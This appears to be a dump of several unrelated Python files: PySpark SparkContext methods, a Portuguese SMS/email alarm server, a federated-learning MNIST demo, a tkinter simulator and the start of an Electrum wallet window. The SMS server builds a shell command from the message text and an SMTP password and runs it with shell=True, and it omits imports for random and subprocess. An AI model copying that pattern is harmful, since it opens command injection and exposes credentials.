Examples
--------
>>> import threading
>>> from time import sleep
>>> from pyspark import InheritableThread
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise RuntimeError("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = InheritableThread(target=start_job, args=(10,)).start()
>>> suppress = InheritableThread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
Notes
-----
If you run jobs in parallel, use :class:`pyspark.InheritableThread` for thread
local inheritance, and preventing resource leak.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
:meth:`setLocalProperty`.
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
Notes
-----
If you run jobs in parallel, use :class:`pyspark.InheritableThread` for thread
local inheritance, and preventing resource leak.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See :meth:`SparkContext.setJobGroup`.
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
Examples
--------
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
@property
def resources(self):
resources = {}
jresources = self._jsc.resources()
for x in jresources:
name = jresources[x].name()
jaddresses = jresources[x].addresses()
addrs = [addr for addr in jaddresses]
resources[name] = ResourceInformation(name, addrs)
return resources
@staticmethod
def _assert_on_driver():
"""
Called to ensure that SparkContext is created only on the Driver.
Throws an exception if a SparkContext is about to be created in executors.
"""
if TaskContext.get() is not None:
raise RuntimeError("SparkContext should only be created and accessed on the driver.")
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
Server_COMPort.py
|
################### SCRIPT DO SERVIDOR DE ENVIO DE SMS ####################################################
# Sintaxe de execucao via cmd: python Server_COMPort.py
# Resumo do funcionamento:
# 1º-Para enviar mensagens de SMS usando um modem SMS, é necessario pluga-lo no computador e inicializa-lo adequadamente.
# Para isso, em geral, o mais recomendado é apenas abrir o software do fabricante logo depois de plugar o modem, esperar
# sua inicializacao, e depois fechar e terminar o programa do fabricante. Em geral, apos esse procedimento, o modem estara
# apto para receber comunicacoes via porta serial. A porta ser usada devera ser verificada via gerenciador de dispositivos
# no OS Windows, na aba de COM PORTS. Se o modem tem suporte e foi corretamente instalado, alguma delas tera AT escrito em seu
# nome, o que significa suporte aos comandos AT, usados nesse programa
# 2º-Esse script resolve o problema de acessos multiplos a portas seriais (no caso de muitos alarmes simultaneos), criando um servidor
# tcp local e escutando na porta 12345. Assim, para enviar um SMS, basta conectar, via telnet, no endereço 127.0.0.1, ou "localhost"
# na porta 12345, enviar a string, e o programa automaticamente envia o SMS para a lista de numeros contida no arquivo "Celulares.txt"
# 3º-As mensagens comecam padronizadas por "Data Center\n" (o \n é uma quebra de linha)
import socket
import serial
import time
import sys
from threading import Thread
Cel_Numbers_Stack=[]
Messages_SMS_Stack=[]
mark=0
COM_Port="COM20"
Baud = 9600
Timeout = 5
Cel_Numbers = []
TCP_IP = '127.0.0.1'
TCP_PORT = 12345
BUFFER_SIZE = 200 # Normally 1024, but we want fast response
Message_SMS = ""
########################## INICIO DA DECLARACAO DE FUNCOES #########################################################################################################################
def SMS():
global Cel_Numbers_Stack
global Messages_SMS_Stack
global mark
timeout = time.time() + 3 #medido em seg
while(1):
time.sleep(0.2)
if(mark):
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Fila surgiu! Mensagem responsavel:"
log+=Messages_SMS_Stack[0]
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
try:
phone = serial.Serial(COM_Port, Baud, timeout=Timeout)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Porta serial aberta com sucesso!"
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
while(mark):
print("SMS Server: Ainda tem numeros na pilha!")
try:
time.sleep(0.5)
phone.write(b'AT\r')
time.sleep(0.5)
phone.write(b'AT+CMGF=1\r')
time.sleep(0.5)
phone.write(b'AT+CMGS=\"' + Cel_Numbers_Stack[0].encode() + b'\"\r')
time.sleep(0.5)
phone.write(Messages_SMS_Stack[0].encode() + b"\r")
time.sleep(0.5)
phone.write(bytes([26]))
time.sleep(2)
print("\nSMS Server: SMS enviado para: "+ Cel_Numbers_Stack[0])
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Envio de novo SMS: "
log+=Messages_SMS_Stack[0]
log+=" Para:"
log+=Cel_Numbers_Stack[0]
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
del Cel_Numbers_Stack[0]
del Messages_SMS_Stack[0]
mark-=1
except:
if(time.time()>timeout):
#EMAIL SOBRE FALHA DO MODEM GSM
try:
file=open("Emails.txt")
AddressesTo = file.read().splitlines()
file.close()
Message_Email_subject="Data Center: MODEM GSM"
Message_Email_body="Problemas no modem GSM ou falta do arquivo logSMS-Server.txt. No caso do modem GSM, por favor, reiniciar:\nPlugue o modem gsm usb DWM-221, abra a aplicacao da Dlink para inicializar o modem, depois, feche a aplicacao completamente. Talvez seja necessario clicar com o botao direito sobre o icone da dlink ao lado do relogio e escolher sair. Não existe impedimento sobre ter conectado usando o software, porém, é necessário fechá-lo para liberar a porta Serial. Isso não irá fechar a conexão de internet, caso tenha sido ativada."
SMTP_server="smtp.xxx.yyy.br"
Port="587"
Username="aaaa.ssss"
Password="xxxxxxx"
AddressFrom="alarme.datacenter@xxx.yyy.br"
Email(SMTP_server, Port, Username, Password, AddressFrom, AddressesTo, Message_Email_subject, Message_Email_body)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Envio de email para REINICIALIZACAO DO MODEM GSM"
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
mark=0
except:{}
print("\nSMS Server: Timeout de 1 hora de tentativas de envio de SMS, fim.")
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Timeout de 1 hora de tentativas de envio de SMS, todos com excecoes, fim da thread."
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
mark=0
else:
continue
phone.close()
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Porta serial fechada com sucesso!"
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
except:
if(time.time()>timeout):
#EMAIL SOBRE FALHA DO MODEM GSM
try:
file=open("Emails.txt")
AddressesTo = file.read().splitlines()
file.close()
Message_Email_subject="Data Center: MODEM GSM"
Message_Email_body="Problemas no modem GSM ou falta do arquivo logSMS-Server.txt. No caso do modem GSM, por favor, reiniciar:\nPlugue o modem gsm usb DWM-221, abra a aplicacao da Dlink para inicializar o modem, depois, feche a aplicacao completamente. Talvez seja necessario clicar com o botao direito sobre o icone da dlink ao lado do relogio e escolher sair. Não existe impedimento sobre ter conectado usando o software, porém, é necessário fechá-lo para liberar a porta Serial. Isso não irá fechar a conexão de internet, caso tenha sido ativada."
SMTP_server="smtp.xxxx.yyyy.br"
Port="587"
Username="alarme.datacenter"
Password="xxxxx"
AddressFrom="alarme.datacenter@xxx.yyyy.br"
Email(SMTP_server, Port, Username, Password, AddressFrom, AddressesTo, Message_Email_subject, Message_Email_body)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Envio de email para REINICIALIZACAO DO MODEM GSM"
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
mark=0
except:
print("\nSMS Server: Timeout de 1 hora de tentativas de envio de SMS, fim.")
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Timeout de 1 hora de tentativas de envio de SMS, todos com excecoes, fim da thread."
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
mark=0
else:
continue
continue
else:{}
#Funcao que realiza o envio dos alertas para os emails listados no arquivo Emails.txt
def Email(SMTP_server, Port, Username, Password, AddressFrom, AddressesTo, Message_subject, Message_body):
Address_completo=""
for number,AddressTo in enumerate(AddressesTo):
Address_completo+=(AddressTo+"; ")
timeout = time.time() + 10 #medido em seg
while(time.time() < timeout):
try:
time.sleep(random.uniform(1, 5))
comando=""
comando+="sendemail.exe -f "
comando+=AddressFrom
comando+=" -t "
comando+=Address_completo
comando+=" -s "
comando+=SMTP_server
comando+=":"
comando+=Port
comando+=" -xu "
comando+=Username
comando+=" -xp "
comando+=Password
comando+=" -o tls=auto -u \""
comando+=Message_subject
comando+="\" -m \""
comando+=Message_body
comando+="\""
subprocess.run(comando, shell=True)
print("\nEmail: Email enviado!")
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Email enviado: Subject:"
log+=Message_subject
log+=" / Body:"
log+=Message_body
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
break
except:
print("\nEmail: Erro, repetindo...")
continue
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="FALHA> email nao enviado: Subject:"
log+=Message_subject
log+=" Body:"
log+=Message_body
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
return
########################## FIM DA DECLARACAO DE FUNCOES #########################################################################################################################
########################## INICIO DO PROGRAMA PRINCIPAL ########################################################################################################################
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
s.listen(1)
#phone = serial.Serial(COM_Port, Baud, timeout=Timeout)
th=Thread(target=SMS , args = [] )
while(1):
conn, addr = s.accept()
print ('\nSMS Server: Connection address:', addr)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Nova conexao recebida, endereco: "
log+=str(addr)
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
data = conn.recv(BUFFER_SIZE)
if(data and str(data).find("b\'\'") == -1):
print ("\nSMS Server: Received data:", data)
conn.send(data) # echo
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Nova mensagem ainda nao processada recebida: "
log+=str(data)
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
message=str(data)
message=str(message[2:-1])
#print(message)
Message_SMS = message
file=open("Celulares.txt")
Cel_Numbers = file.read().splitlines()
file.close()
if (not th.isAlive()):
for colocacao,Celphone in enumerate(Cel_Numbers):
mark+=1
Cel_Numbers_Stack.append(Celphone)
Messages_SMS_Stack.append(Message_SMS)
th.daemon=True
th.start()
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Nova thread iniciada! Mensagem que deu inicio: "
log+=Message_SMS
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
else:
for colocacao,Celphone in enumerate(Cel_Numbers):
mark+=1
Cel_Numbers_Stack.append(Celphone)
Messages_SMS_Stack.append(Message_SMS)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Thread ja estava ativa! Mensagem adicionada à pilha de envio: "
log+=Message_SMS
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
except:
print("Excecao, fim do SMS Server.")
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="FALHA> Excecao detectada, fim do SMS Server."
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
sys.exit()
########################## FIM DO PROGRAMA PRINCIPAL #########################################################################################################################
|
fl.py
|
import multiprocessing
import shutil
import pymongo
from os import path, mkdir
from time import time, sleep
import tensorflow as tf
from tensorflow.keras.models import load_model
from tensorflow.keras.datasets import mnist
from dFL.Peer.client import Client
from dFL.Peer.node import Node
from dFL.Utils.config import config
from dFL.MainServer.api import ControlServer
# Create the database for the main server if the database does not exist
def create_database():
name = config['database']['name']
ip = config['database']['ip']
port = config['database']['port']
db_client = pymongo.MongoClient(f"mongodb://{ip}/{port}")
if name not in db_client.list_database_names():
my_db = db_client[name]
else:
db_client.drop_database(name)
my_db = db_client[name]
my_db.create_collection("Nodes")
my_db.create_collection("Processes")
db_client.close()
# Create nodes and a process
def create_nodes(num_nodes, num_blocks):
nodes: list = []
process_id = 0
for i in range(num_nodes):
node = Node()
if i == 0:
# Create new FL Process
process_id = node.registration.create_process({
"num_blocks": num_blocks,
"start": time(),
"timeout": 600,
"file_extension": "csv"
})
node.registration.participate(process_id, f"http://127.0.0.1:{5001+i}", {'id': i})
nodes += [node]
return nodes
class DigitClassification:
def __init__(self, node_index: int, num_nodes: int):
self.ds_train, self.ds_val, self.ds_test = DigitClassification.load_data(node_index, num_nodes)
self.model = DigitClassification.build_model()
self.load_the_model()
@staticmethod
def load_data(node_index: int, num_nodes: int):
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Prepare training data
size_train = int(x_train.shape[0] / num_nodes)
start_train = node_index * size_train
x_train = x_train[start_train: (start_train + size_train)]
y_train = y_train[start_train: (start_train + size_train)]
# Prepare validation data
size_val = int(x_test.shape[0] / num_nodes * 0.25)
start_val = node_index * size_val
x_val = x_test[start_val: (start_val + size_val)]
y_val = y_test[start_val: (start_val + size_val)]
# Prepare testing data
size_test = int(x_test.shape[0] / num_nodes * 0.75)
start_test = start_val + size_val
x_test = x_test[start_test: (start_test + size_test)]
y_test = y_test[start_test: (start_test + size_test)]
return (x_train, y_train), (x_val, y_val), (x_test, y_test)
@staticmethod
def build_model():
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10)
])
model.compile(
optimizer=tf.keras.optimizers.Adam(0.001),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],
)
return model
def train_model(self, epochs: int = 1):
self.model.fit(x=self.ds_train[0], y=self.ds_train[1], epochs=epochs, validation_data=self.ds_val)
def get_model_parameters(self):
return self.model.get_weights()
def set_model_parameters(self, weights: list):
self.model.set_weights(weights)
def save_model(self):
self.model.save('models')
def load_the_model(self):
self.model = load_model(path.join(path.dirname(path.realpath(__file__)), 'models'))
def test_model(self):
loss, acc = self.model.evaluate(x=self.ds_test[0], y=self.ds_test[1])
return loss, acc
class FederatedLearning:
def __init__(self, node_id, process_id):
self.client = Client(node_id, process_id)
node_index = self.client.lookup[node_id]['index']
num_nodes = len(self.client.lookup)
self.classifier = DigitClassification(node_index, num_nodes)
self.train()
sleep(10)
self.start_fl()
def train(self):
self.classifier.train_model(20)
data = self.classifier.get_model_parameters()
self.client.store_blocks(data)
def start_fl(self):
loss_old, acc_old = self.classifier.test_model()
model_updates = self.client.run()
self.classifier.set_model_parameters(model_updates)
loss_new, acc_new = self.classifier.test_model()
print(f"{self.client.node_id} : Old model loss {loss_old}, acc {acc_old}")
print(f"{self.client.node_id} : New model loss {loss_new}, acc {acc_new}")
if __name__ == "__main__":
# uncomment this for one time to create the initial model
# ds = DigitClassification(0,10)
# ds.save_model()
# print()
control_server_process = multiprocessing.Process(target=ControlServer, daemon=True)
control_server_process.start()
sleep(3)
if path.exists(config['root_directory']):
shutil.rmtree(config['root_directory'])
mkdir(config['root_directory'])
create_database()
nodes_list = create_nodes(6, 6)
processes = []
for i in range(6):
processes += [multiprocessing.Process(target=FederatedLearning, args=(i, 0))]
processes[-1].start()
for pi in processes:
pi.join()
control_server_process.terminate()
|
world.py
|
from tkinter import *
from Simulator.Lyric.lyric import *
from Simulator.Me import *
# from Simulator.Render import *
from Simulator.Sound.sound import *
from Simulator.ui_logger import UiLogger
# from Simulator.PPT3D.PPT import *
from Simulator.PPT3D.ppt3d import Page, Frame as mFrame, PPT, PPT3D
import random
from PIL import Image
import multiprocessing
import cv2
class World:
def __init__(self, root=None):
self.root = root
if self.root is None:
self.root = Tk()
self.title = 'World Simulator'
self.new_title(self.title)
# 一些基本类
self.spectrum_map = SpectrumMap()
self.spectrum_map_wave = SpectrumMap()
# self.spectrum = SpectrumMap()
self.lrc = Lyric()
self.sound = Sound()
# 在这里构建窗口
frame_left = Frame(self.root)
frame_right = Frame(self.root)
# 音频频谱表现
# im = self.spectrum_map.map(1024*10)
# imp = ImageTk.PhotoImage(image=im)
# self.voice = Label(frame_right, image=imp)
self.voice = Label(frame_right)
# self.voice.image = imp
self.voice.grid(row=1, column=0, sticky=W+E)
# Me说的话
self.words = UiLogger(frame_right, title='I said', max_height=8)
self.words.logger().grid(row=2, column=0, sticky=W + E)
# My Status
self.status = UiLogger(frame_right, title='Status', max_height=10)
self.status.logger().grid(row=3, column=0, sticky=W + E)
# 程序运行日志
self.log = UiLogger(frame_right, title='Logs', max_height=5)
self.log.logger().grid(row=4, column=0, sticky=W+E)
# 占位窗口
# self.span = UiLogger(frame_left, title='Simulation', max_height=22, width=600, height=300)
# self.span.logger().grid(row=1, column=1, sticky=W+E, columnspan=2)
self.span = LabelFrame(frame_left, text='Simulation', width=800+2, height=600+2)
self.span.grid(row=1, column=1, sticky=W + E, columnspan=2)
# 处理中
self.processing = UiLogger(frame_left, title='Processing', max_height=5)
self.processing.logger().grid(row=2, column=1, sticky=W+E)
# 数据
self.data = UiLogger(frame_left, title='Data', max_height=5)
self.data.logger().grid(row=2, column=2, sticky=W+E)
# frame_left.configure(width=600)
# frame_left['width'] = 600
frame_left.pack(side=LEFT)
frame_right.pack(side=RIGHT)
# im = self.spectrum_map.map(1024, clear=True)
# im.save('spectrum_map.png')
# 处理3D窗口
self.ppt = PPT()
page = Page()
page.frames.append(mFrame(image=Image.new("RGBA", (128, 128))))
page.position.load([random.random() * 6.8 for i in range(3)])
self.ppt.pages.append(page)
self.ppt3d = None
t = threading.Thread(target=self.gl_mainloop)
t.setDaemon(True)
t.start()
# p = multiprocessing.Process(target=self.gl_mainloop)
# p.daemon = True
# p.start()
# self.thread()
t = threading.Thread(target=self.thread)
t.setDaemon(True)
t.start()
self.sound.load()
self.sound.play()
self.lrc.start()
def new_title(self, title: str):
self.title = title
self.root.title(self.title)
# def thread(self):
# # self.logger.push(UiLogger.Item(random.randint(0, 4), 'create', 'World No.%s' % random.randint(0, 9999)))
# if self.lrc.has_new():
# self.logger.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'Lyric', self.lrc.next()))
# self.root.after(10, self.thread)
def thread(self):
# def im_clear(x):
# if x == 255:
# return 0
# return x
im = SpectrumMap.blend(self.spectrum_map, self.spectrum_map_wave, 1024)
# im = self.spectrum.fetch(1)
im = im.resize((256, 140))
# imp = ImageTk.PhotoImage(image=im)
# self.voice.configure(image=imp)
# self.voice.image = imp
img = cv2.cvtColor(np.asarray(im), cv2.COLOR_RGB2BGR)
cv2.imshow('Voice', img)
cv2.waitKey(1)
if self.lrc.has_new():
self.words.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'Lyric', self.lrc.next()))
# self.root.after(1, self.thread)
self.thread()
def title_manager(self):
pass
def mainloop(self):
self.root.mainloop()
def gl_mainloop(self):
self.ppt3d = PPT3D(self.ppt, window_size=(800, 600), pos=[self.root.winfo_x(), self.root.winfo_y()])
self.ppt3d.mainloop()
if __name__ == '__main__':
_world = World()
_world.mainloop()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
